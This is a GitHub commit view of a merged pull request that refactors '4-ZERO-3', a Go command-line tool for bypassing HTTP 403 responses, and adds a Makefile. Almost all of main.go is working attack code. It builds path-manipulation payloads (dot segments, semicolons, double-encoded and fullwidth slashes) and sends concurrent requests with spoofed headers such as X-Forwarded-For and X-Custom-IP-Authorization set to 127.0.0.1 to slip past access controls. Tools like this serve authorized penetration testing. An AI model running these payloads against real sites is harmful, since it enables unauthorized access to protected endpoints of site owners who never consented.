Merge pull request #1 from ClavinJune/main

Improve Code, Add Goroutine
main
Muhammad Daffa 2021-07-18 19:52:23 +07:00 committed by GitHub
commit 9c1edf9fc7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 125 additions and 73 deletions

2
Makefile Normal file
View File

@ -0,0 +1,2 @@
fmt:
@gofmt -w -s main.go && goimports -w main.go && go vet main.go

196
main.go
View File

@ -1,46 +1,21 @@
package main package main
import ( import (
"context"
"flag" "flag"
"fmt" "fmt"
"log" "log"
"net/http" "net/http"
"os" "regexp"
"runtime"
"strings" "strings"
"sync"
"time"
) )
var Red = "\033[31m" var (
var Green = "\033[32m" reURL = regexp.MustCompile("^https?://")
var White = "\033[97m" headerPayloads = []string{
func main() {
domain := flag.String("url", "", "A domain with the protocol. Example: https://daffa.tech")
path := flag.String("path", "", "An endpoint. Example: admin")
flag.Parse()
if *domain == "" || *path == "" {
log.Fatalln("Using flag -url and -path")
os.Exit(0)
}
upperCase := strings.ToUpper(*path)
endpoint := []string{
*domain + "/" + upperCase,
*domain + "/" + *path + "/",
*domain + "/" + *path + "/.",
*domain + "//" + *path + "//",
*domain + "/./" + *path + "/./",
*domain + "/./" + *path + "/..",
*domain + "/;/" + *path,
*domain + "/.;/" + *path,
*domain + "//;//" + *path,
*domain + "/" + *path + "..;/",
*domain + "/%2e/" + *path,
*domain + "/%252e/" + *path,
*domain + "/%ef%bc%8f" + *path}
headers := []string{
"X-Custom-IP-Authorization", "X-Custom-IP-Authorization",
"X-Originating-IP", "X-Originating-IP",
"X-Forwarded-For", "X-Forwarded-For",
@ -49,52 +24,127 @@ func main() {
"X-Host", "X-Host",
"X-Forwarded-Host", "X-Forwarded-Host",
"X-ProxyUser-Ip", "X-ProxyUser-Ip",
"X-Remote-Addr"} "X-Remote-Addr",
}
)
fmt.Println(Green, " _ _ ___ ____ ____ ") const (
fmt.Println(Green, "| || | / _ \\___ \\ | _ \\ ") version string = "v1.1.0"
fmt.Println(Green, "| || |_| | | |__) |_____| |_) |_ _ _ __ __ _ ___ ___ ___ _ __ ") red string = "\033[31m"
fmt.Println(Green, "|__ _| | | |__ <______| _ <| | | | '_ \\ / _` / __/ __|/ _ \\ '__| ") green string = "\033[32m"
fmt.Println(Green, " | | | |_| |__) | | |_) | |_| | |_) | (_| \\__ \\__ \\ __/ | ") white string = "\033[97m"
fmt.Println(Green, " |_| \\___/____/ |____/ \\__, | .__/ \\__,_|___/___/\\___|_| ")
fmt.Println(Green, " __/ | | ")
fmt.Println(Green, " |___/|_| v1.0.2", White)
fmt.Println("\nDomain:", *domain) headerValue string = "127.0.0.1"
fmt.Println("Path:", *path) )
fmt.Println("\nNormal Request") func showBanner() {
for i, str := range endpoint { fmt.Printf("%s %s %s %s %s %s %s %s %s %s %s\n", green,
req, err := http.Get(str) " _ _ ___ ____ ____\n",
if err != nil { "| || | / _ \\___ \\ | _ \\\n",
log.Fatal(err) "| || |_| | | |__) |_____| |_) |_ _ _ __ __ _ ___ ___ ___ _ __\n",
} "|__ _| | | |__ <______| _ <| | | | '_ \\ / _` / __/ __|/ _ \\ '__|\n",
output := fmt.Sprintf("%s %d %s", str, req.StatusCode, http.StatusText(req.StatusCode)) " | | | |_| |__) | | |_) | |_| | |_) | (_| \\__ \\__ \\ __/ |\n",
if req.StatusCode == 200 { " |_| \\___/____/ |____/ \\__, | .__/ \\__,_|___/___/\\___|_|\n",
fmt.Println(Green, i+1, output, White) " __/ | |\n",
} else { " |___/|_| ",
fmt.Println(Red, i+1, output, White) version, white)
} }
func getValidDomain(domain string) string {
trimmedDomain := strings.TrimSpace(domain)
if !reURL.MatchString(trimmedDomain) {
trimmedDomain = "https://" + trimmedDomain
} }
fmt.Println("\nRequest with Headers") return trimmedDomain
for j, head := range headers { }
req2, err := http.NewRequest("GET", *domain+"/"+*path, nil)
if err != nil {
log.Fatal(err)
}
req2.Header.Set(head, "127.0.0.1")
resp, err := http.DefaultClient.Do(req2)
if err != nil {
log.Fatal(err)
}
output2 := fmt.Sprintf("%s %s %d %s", head, *domain+"/"+*path, resp.StatusCode, http.StatusText(resp.StatusCode))
if resp.StatusCode == 200 { func constructEndpointPayloads(domain, path string) []string {
fmt.Println(Green, j+1, output2, White) return []string{
} else { domain + "/" + strings.ToUpper(path),
fmt.Println(Red, j+1, output2, White) domain + "/" + path + "/",
} domain + "/" + path + "/.",
domain + "//" + path + "//",
domain + "/./" + path + "/./",
domain + "/./" + path + "/..",
domain + "/;/" + path,
domain + "/.;/" + path,
domain + "//;//" + path,
domain + "/" + path + "..;/",
domain + "/%2e/" + path,
domain + "/%252e/" + path,
domain + "/%ef%bc%8f" + path,
} }
} }
func penetrateEndpoint(wg *sync.WaitGroup, url string, header ...string) {
ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
defer cancel()
defer wg.Done()
req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)
if err != nil {
log.Fatal(err)
}
var h string
if header != nil {
h = header[0]
req.Header.Set(h, headerValue)
}
resp, err := http.DefaultClient.Do(req)
if err != nil {
log.Fatal(err)
}
defer resp.Body.Close()
color := green
if resp.StatusCode != 200 {
color = red
}
log.Println(color, h, url, resp.StatusCode, http.StatusText(resp.StatusCode), white)
}
func main() {
runtime.GOMAXPROCS(1)
domain := flag.String("url", "", "A domain with the protocol. Example: https://daffa.tech")
path := flag.String("path", "", "An endpoint. Example: admin")
flag.Parse()
if *domain == "" || *path == "" {
log.Fatalln("Using flag -url and -path")
}
validDomain := getValidDomain(*domain)
validPath := strings.TrimSpace(*path)
endpoints := constructEndpointPayloads(validDomain, validPath)
showBanner()
fmt.Println("\nDomain:", validDomain)
fmt.Println("Path:", validPath)
fmt.Println("\nNormal Request")
var wg sync.WaitGroup
wg.Add(len(endpoints))
for _, e := range endpoints {
go penetrateEndpoint(&wg, e)
}
wg.Wait()
fmt.Println("\nRequest with Headers")
wg.Add(len(headerPayloads))
for _, h := range headerPayloads {
go penetrateEndpoint(&wg, validDomain+"/"+validPath, h)
}
wg.Wait()
}